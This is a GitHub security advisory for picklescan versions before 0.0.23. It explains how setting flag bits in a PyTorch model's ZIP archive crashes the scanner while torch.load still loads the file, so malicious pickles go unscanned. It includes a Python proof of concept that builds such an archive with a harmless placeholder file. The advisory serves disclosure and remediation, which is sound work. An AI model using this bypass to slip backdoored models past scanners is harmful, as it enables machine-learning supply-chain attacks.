GHSA-w8jq-xcqf-f792

Suggest an improvement
Source
https://github.com/advisories/GHSA-w8jq-xcqf-f792
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-w8jq-xcqf-f792/GHSA-w8jq-xcqf-f792.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-w8jq-xcqf-f792
Aliases
Published
2025-03-10T18:26:35Z
Modified
2025-03-10T18:42:06.738351Z
Severity
  • 5.3 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N CVSS Calculator
Summary
Zip Flag Bit Exploit Crashes Picklescan But Not PyTorch
Details

Summary

PickleScan fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.

Details

PickleScan relies on Python’s zipfile module to extract and scan files within ZIP-based model archives. However, certain flag bits in ZIP headers affect how files are interpreted, and some of these bits cause PickleScan to fail while leaving PyTorch’s loading mechanism unaffected.

By modifying the flag_bits field in the ZIP file entry, an attacker can:

  • Embed a malicious pickle file (bad_file.pkl) in a PyTorch model archive.
  • Flip specific bits (e.g., 0x1, 0x20, 0x40) in the ZIP metadata.
  • Prevent PickleScan from scanning the archive due to errors raised by zipfile.
  • Successfully load the model with torch.load(), which ignores the flag modifications.

This technique effectively bypasses PickleScan's security checks while maintaining model functionality.

PoC

import os
import zipfile
import torch
from picklescan import cli

def can_scan(zip_file):
    try:
        cli.print_summary(False, cli.scan_file_path(zip_file))
        return True
    except Exception:
        return False

bit_to_flip = 0x1  # Change to 0x20 or 0x40 to test different flag bits

zip_file = "model.pth"
model = {'a': 1, 'b': 2, 'c': 3}
torch.save(model, zip_file)

with zipfile.ZipFile(zip_file, "r") as source:
    flipped_name = f"flipped_{bit_to_flip}_{zip_file}"
    with zipfile.ZipFile(flipped_name, "w") as dest:
        bad_file = zipfile.ZipInfo("model/bad_file.pkl")

        # Modify the ZIP flag bits
        bad_file.flag_bits |= bit_to_flip

        dest.writestr(bad_file, b"bad content")
        for item in source.infolist():
            dest.writestr(item, source.read(item.filename))

if model == torch.load(flipped_name, weights_only=False):
    if not can_scan(flipped_name):
        print('Found exploitable bit:', bit_to_flip)
else:
    os.remove(flipped_name)

Impact

Severity: High

  • Who is impacted? Any organization or user relying on PickleScan to detect malicious pickle files inside PyTorch models.
  • What is the impact? Attackers can embed malicious pickle payloads inside PyTorch models that evade PickleScan's detection but still execute upon loading.
  • Potential Exploits: This vulnerability could be exploited in machine learning supply chain attacks, allowing attackers to distribute backdoored models on platforms like Hugging Face or PyTorch Hub.

Recommendations

  • Improve ZIP Handling: PickleScan should use a more relaxed ZIP parser marches on when encountering modified flag bits.
  • Scan All Embedded Files Regardless of Flags: Ensure that files with altered metadata are still extracted and analyzed.

By addressing these issues, PickleScan can provide stronger protection against manipulated PyTorch model archives.

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-345"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-10T18:26:35Z"
}
References

Affected packages

PyPI / picklescan

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.0.23

Affected versions

0.*

0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.0.6
0.0.7
0.0.8
0.0.9
0.0.10
0.0.11
0.0.12
0.0.13
0.0.14
0.0.15
0.0.16
0.0.17
0.0.18
0.0.19
0.0.20
0.0.21
0.0.22